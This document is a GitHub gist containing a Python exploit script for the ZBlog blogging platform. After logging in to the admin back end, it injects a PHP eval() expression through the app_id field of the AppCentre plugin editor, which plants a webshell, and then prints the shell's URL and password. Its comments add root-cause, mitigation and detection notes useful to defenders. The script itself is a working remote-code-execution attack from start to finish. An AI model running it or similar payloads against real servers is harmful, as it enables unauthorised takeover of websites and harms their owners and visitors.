@WangYihang
Last active December 14, 2017 03:18
ZBlog Background Getshell Exploit
#!/usr/bin/env python
# encoding:utf-8
# zblog-background-getshell-exploit
# Author : Shutdown_r & WangYihang
import requests
import hashlib
import sys
import string
# Alphanumeric label placed at the start of the submitted "app_id" value in
# exploit() and of the plugin path printed by main(); checked by check_prefix().
# For incident response: with these defaults the path printed by main() starts
# with zb_users/plugin/image' and ends in update.php.
prefix = "image"
# Name of the request parameter that the injected eval() expression reads.
webshell_password = "c"
# Sent as the "app_path" form field; also the last segment of the printed URL.
filename = "update.php"
# One shared HTTP session: login() and exploit() both post through it, so any
# cookie set by the login response is carried over to the later request.
session = requests.Session()
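def check_prefix(prefix):
    """Return True when ``prefix`` is at least 3 ASCII alphanumeric characters.

    The prefix is interpolated into the ``app_id`` form field and into the
    plugin path printed by ``main``, so it is restricted to ``[a-zA-Z0-9]``.

    Two fixes over the earlier version:

    * ``string.letters`` is locale-dependent on Python 2 and does not exist on
      Python 3, so it did not guarantee the ``[a-zA-Z0-9]`` set the error
      message promises; ``string.ascii_letters`` does.
    * The length message said "> 3" while the check accepts a length of
      exactly 3; the message now matches the check.

    Prints a diagnostic and returns False on the first failed rule.
    """
    allowed = set(string.ascii_letters + string.digits)
    if len(prefix) < 3:
        print("[-] The length of 'prefix' must be >= 3")
        return False
    if any(ch not in allowed for ch in prefix):
        print("[-] The prefix must be [a-zA-Z0-9]")
        return False
    return True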
def md5(content):
    """Return the hexadecimal MD5 digest of ``content``.

    ``login`` posts this digest in the "password" field instead of the
    plaintext password.
    NOTE(review): an unsalted MD5 sent over plain HTTP is replayable by anyone
    who can observe the request, so it protects the password no better than
    sending it in the clear.
    """
    hasher = hashlib.md5()
    hasher.update(content)
    return hasher.hexdigest()
def login(host, port, username, password):
    """Log the shared session in to the admin back end; return True on success.

    Posts ``username`` and the MD5 hex digest of ``password`` to
    ``/zb_system/cmd.php?act=verify`` over plain HTTP, then looks for a marker
    string in the response body.

    This step requires valid back-end credentials, so the issue exercised by
    this script is post-authentication. Credential hygiene and restricting
    access to the admin endpoints limit exposure, but do not remove the flaw.
    """
    verify_url = "http://%s:%d/zb_system/cmd.php?act=verify" % (host, port)
    credentials = {
        "username": username,
        "password": md5(password),
    }
    body = session.post(verify_url, data=credentials).content
    # The marker is Chinese for "admin home page"; presumably it is only
    # rendered for an authenticated session -- confirm against the target.
    if "后台首页" in body:
        return True
    return False
def exploit(host, port):
    """Submit the crafted plugin form and report whether it was accepted.

    Posts to ``/zb_users/plugin/AppCentre/plugin_edit.php`` with an ``app_id``
    that contains a single quote followed by a PHP ``eval`` expression, and an
    ``app_path`` naming the PHP file. An empty response body is treated as
    success.

    NOTE(review): the root cause appears to be that the server accepts quote
    characters in ``app_id`` and writes the value unescaped into generated PHP
    source -- confirm against the AppCentre plugin code.

    Mitigation: validate ``app_id`` server-side against an identifier
    allowlist such as ``[a-zA-Z0-9_]`` and never interpolate request data into
    generated PHP.

    Detection: POST requests to ``plugin_edit.php`` whose ``app_id`` contains
    quotes or ``eval(``, and directories under ``zb_users/plugin/`` whose
    names are not plain identifiers.
    """
    target = "http://%s:%d/zb_users/plugin/AppCentre/plugin_edit.php" % (
        host, port)
    form = {
        "app_id": "%s'.eval($_REQUEST[%s]).'" % (prefix, webshell_password),
        "app_path": filename,
    }
    body = session.post(target, data=form).content
    # Marker is Chinese for "an APP with the same name already exists".
    if "已存在同名的APP应用" in body:
        print("[-] PlugIn name has been used! Please change the prefix!")
        return False
    # Any other non-empty body is an unrecognised response.
    if len(body) != 0:
        print("[-] Unknown error!")
        return False
    return True
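def main():
    """Command-line entry point: parse arguments, log in, then call ``exploit``.

    Expects exactly four arguments: HOST PORT USERNAME PASSWORD.
    Exit status: 1 for a usage error, 2 when the module-level ``prefix`` fails
    ``check_prefix``, 3 when login fails. A failed ``exploit`` call only
    prints a message.

    Changes from the earlier version: the usage text typos ("USERNAEM",
    "Examplt") are corrected, the reported parameter name is taken from
    ``webshell_password`` instead of a hard-coded "c" that would go stale if
    the constant were edited, and ``sys.exit`` replaces the interactive-only
    ``exit`` helper.

    For incident response: the URL printed on success is the path where the
    generated PHP file is expected, so that is the location to inspect on a
    host suspected of having been targeted by this script.
    """
    if len(sys.argv) != 5:
        print("Usage : ")
        print("\tpython %s [HOST] [PORT] [USERNAME] [PASSWORD]" % (sys.argv[0]))
        print("Example : ")
        print("\tpython exploit.py 127.0.0.1 80 admin admin")
        print("Script Author : ")
        print("\tWangYihang<wangyihanger@gmail.com>")
        print("vulnerability Author : ")
        print("\tShutdown-r")
        sys.exit(1)
    host = sys.argv[1]
    port = int(sys.argv[2])
    username = sys.argv[3]
    password = sys.argv[4]
    if not check_prefix(prefix):
        sys.exit(2)
    # Built from the same pieces as the app_id posted by exploit(), so the
    # printed path matches the submitted plugin id.
    webshell_url = "http://%s:%d/zb_users/plugin/%s'.eval($_REQUEST[%s]).'/%s" % (
        host, port, prefix, webshell_password, filename)
    if not login(host, port, username, password):
        print("[-] Login failed!")
        print("[-] Please check your username and password")
        sys.exit(3)
    print("[+] Login success!")
    print("[+] Starting exploit...")
    if exploit(host, port):
        print("[+] Exploit success!")
        print("[+] Enjoy your shell :")
        print("[+] Url : %s" % (webshell_url))
        print("[+] Pas : %s" % (webshell_password))
        print("[+] Remember to die() it!")
    else:
        print("[-] Exploit failed!")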
# Call main() only when the file is executed directly, not when it is imported.
if __name__ == "__main__":
    main()